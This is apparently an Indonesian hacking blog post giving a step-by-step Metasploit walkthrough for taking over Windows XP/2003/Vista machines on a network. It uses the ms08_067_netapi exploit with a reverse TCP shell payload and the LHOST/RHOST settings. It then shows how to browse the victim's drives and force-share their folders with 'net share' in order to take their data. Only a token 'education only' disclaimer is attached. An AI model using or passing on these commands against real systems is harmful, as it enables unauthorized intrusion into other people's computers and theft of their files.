| IchangkZ

Mengambil Alih Komputer Target Dalam Jaringan

Tanpa banyak bacot dari ane lagi,silahkan anda baca judul diatas,kali ini teknik yang kita gunakan yaitu teknik Remote Exploit. Dan Yang perlu kamu siapkan pada sesi kali ini yaitu:

mengambil alih komputer target dalam jaringan

· Metasploit Framework 3.2 For Windows, dapat kamu download disini: http://www.metasploit.org/framework/download/?id=framework-3.2.exe

· Komputer target yang menggunakan OS Win XP SP2, SP3, Win2003, atau WinVista. (gue menggunakan Windows XP SP2).

· - Alamat IP Address Target.

Jika diatas telah terpenuhi, sekarang kamu jalankan Program Metasploit 3.2, tepatnya kamu pilih Metasploit 3 Web (lihat gambar).
mengambil alih komputer target dalam jaringan

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheem6IFoW-hhWyoJfQwJwWsC4UCW4w9o6_W94XsXFRHaFY02OeS4AwKSAN9ScILbrjpUOZ9DTuxMMwUsAHucRz6pQU4wC2aOQfCMUu8BWBK3At15FCEjFnWWyelNn2TbisDM3B4g9pnPA9/s320/image001.png

Tunggu beberapa saat,(sabar yach) Setelah itu akan tampil seperti gambar dibawah ini:

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEim0YbhbcE_FZzypmYKuH-Hk-IN7fs31C_59Kvg7Wf4mxvR0TxR2zrMl_emk2EXzBS-zMR9byzolx38dnD5ifj2fAplb8tnBxEcE1vRKqI8VNBk6cSh_13mgQPVk7u014r20TiqenfLiEol/s320/image003.jpg

Jika udah tampil loe pilih menu Console. Maka akan tampil jendela seperti berikut:

mengambil alih komputer target dalam jaringan

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZo4d6Lnh7zkx_Q_sCIav49kjxbFB00DU2C-mSL-ss5C3CpAfu0_Y5M-yTcbnlZcXHtvBO9M-Tz7Q3H4SPFadw4e8Xbzc4873bFDRcuOHXpVnW25KuuVLtQjjWNrnopWfizfB7Zszk0SFJ/s400/image005.png

Ketikkan perintah show exploits kemudian tekan Enter

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVgxGil8gAjhKPy8dfHEyeOX2HpJPdZUVC-jmN4_XV0uny8KudBUwnJLlLBUbm2sfxEVlBWM-gdK8FciQDTv1hkR7bLr0GHEL-q-NjMKtk_CroYlbTlLM59RahHiGIJR6U7_AlmFl__Cpk/s400/image007.jpg

Maka akan tampil Modul exploit seperti beirkut:

mengambil alih komputer target dalam jaringan

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwHALCQBROcuj0MjmxjqAIp7hWjydUZ3FJz2sEwvXk4xQ6BpXPaP85HRav8myPEANgWHM3GEcnkB9cFh8IZB1qy5st0hU5JgC3Yf9-7Dt9anH67k3ce4RyJ5kQs95ds6eReV6jVWTbo56h/s400/image008.jpg

Kemudian pilih modul exploit untuk kelemahan pada Netapi32, caranya dengan mengetikkan :

use windows/smb/ms08_067_netapi kemudian Enter

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmWvENjRetmyfiAc1GAA04HXiUKZp_jU_ou7UsSQBmdX2xkzZeHUjgHW7Wgu5g7_WJWUjAkGI23O0k2OMR6DxugtF9dhglC4-psV43UkdL22PY5qIbdlzYNf0MKx1ARb72cMoYVYgyWOKh/s400/image010.jpg

Kemudian pilih jenis payload. Kali ini kita pilih payload yang akan menghubungkan shell komputer target dengan komputer penyerang melalui TCP. Caranya dengan mengetikkan perintah:

set payload windows/shell/reverse_tcp (kemudian Enter)

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjx9LboBfHPj6TqmUDqJTEDaUYt054lZsZkOZXwpiWA-0n33F-aJxVSyM0giy-DdNDJD5Q0JfGSVW88mmfbXDHYI_th0PY5s-2XuW7DBg0D2ybW22Ldpk18ZnUXQ7qwcNpU2AzCcXgXFZz9/s400/image014.jpg

Kemudian masukkan IP Address kamu, dengan cara mengetikkan perintah :
set LHOST 192.168.0.17 Enter <----- Contoh dengan IP gue.

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjdKofAtfK0_1KZBVDeTuca4xQLx4J__JqRTVwX3Jv6w9G5w5nR165qRxikzTjKn2-BmJQxqqiugQGbDLO0JiJ_3Qu2rH2zHUj0orNDlRov8hajoIShb9DYRIMFiKfAi2bmgLlJMmmsQyh/s400/image016.jpg

Kemudian masukkan IP Address target kamu, dengan cara mengetikkan perintah :
set RHOST 192.168.0.16 Enter <----- Contoh dengan Target gue.

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCnCgLEIx92kMPH5uHWzVFQkhasW_VLvITBa88ATQ35ZHysIz83w9hVmyjluC1hTKFkYADMNmrf8zwj0BCg6umy2lSxQNas_GYIo5VrfrFetNkg7sBmajguVjQ1ns0KLBIQAPDCmFSdr20/s400/image017.jpg

Semuanya udah siap…? Siap…!!! Ready!!! 1….2….3… tunggu dulu bro, ketik dulu instruksi/perintah exploit kemudian tekan Enter.

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg24ng-of_zXtmUAXpuKtf27jT1GbeIXVGSzJauzOQQ-Jb2ERzvn-mLK7Cv0Rk1Mf-WCzhvqO4mcespVzScQPnBQU3kXjU08Zf5YW0VFEZJ8AEDkWZSaw8oiPlNaJbxhg5iWUHS5eoGXHGy/s400/image019.jpg

Tedennnnggggg!!! Abrakadabra!!!, sistem target telah diambil alih

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5-eWD7Oh4HRtNxf4fhznuCV0lmsUxJaW2LgzGpA4rlUDlqatbg_uuCDzq0MjJ_V1NVEFe8SkAWUCziDhCnv0NrnWCsKXtpVDrJp-AjbfxdRsA5YgZJRj0I7UULwCTrw3dDPsUa28Uc7KG/s400/image021.jpg

Sekarang kita telah berada di direktori c:\windows\system32 sang target. Akses penuh telah ditangan. Selanjutnya tinggal kreatifitas kalian. Untuk mengintip data pada komputer target, silahkan jalankan perintah MS DOS. Sebagai contoh, kita akan menuju drive “D” korban, dengan mengetikkan perintah >> d: Enter. Kemudian lakukan perintah DIR untuk melihat isi data drive D komputer korban.

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1nVIb4_0fHJDNitlZ7fO1WUHiNNvjRIaJQFnVsFhXIcZfuUWecz_gCGOTRPJqK5U91h_OU5XE4m-wyFgW1rbxZTJP4-rkUqJcgmDBCnPBrF2KJRqIIlYh4r2QKQ4QRZxoPDdMnVnloSD4/s400/image023.jpg

Untuk mengambil data pada komputer korban, kita akan melakukan sharing paksa dari komputer korban dengan menjalankan perintah.

net share namafolder=d:\lokasifolder /UNLIMITED kemudian enter. Lihat gambar dibawah ini:

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGTbFK6HFexjFoCzhY4zoKdENXK8PjLeQq2fjMyVvcBDYJGDprmUEf8I9gmChDhpB_Lwqhc5_Ix-0h_K4q5RuG5Np3VPqJM-Lnn9TRi7BGLxPcIKdMYQtIUQI7eTe59EBSqfI27dsgQLzS/s400/image025.jpg

Kemudian masuk pada windows Explorer, lalu ketikkan pada Address Bar \\Alamat IP target\namafolder yang telah dishare paksa. Contoh:

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhacS85sZ6LfhDeXn2KfXWau0OoWTWWTwP-TxdgTvXX8StrxgEQ57upls4b2B8uP8DHjTvi9M71WTa1LyG1fMXBDDSen8t3LF-B12VYXshyaGeok-D7L4a2wGrViDvjzLghNZyerxL3Jt0D/s400/image028.jpg

ada dua kemungkinan yg bisa muncul,berhasil dan...gagal...coba2 aja...mungkin berhasil...ingat klw berhasil dosa anda tanggung sendiri,saya tidak bertanggung jawab,isi blog ini full hanya untuk edukasi.

IchangkZ

Posting Komentar

Daftar Blog Saya

Halaman

Statistik

Translate

Mengenai Saya

Blog Archive

Search in this blog

Search

Postingan Populer

Wikipedia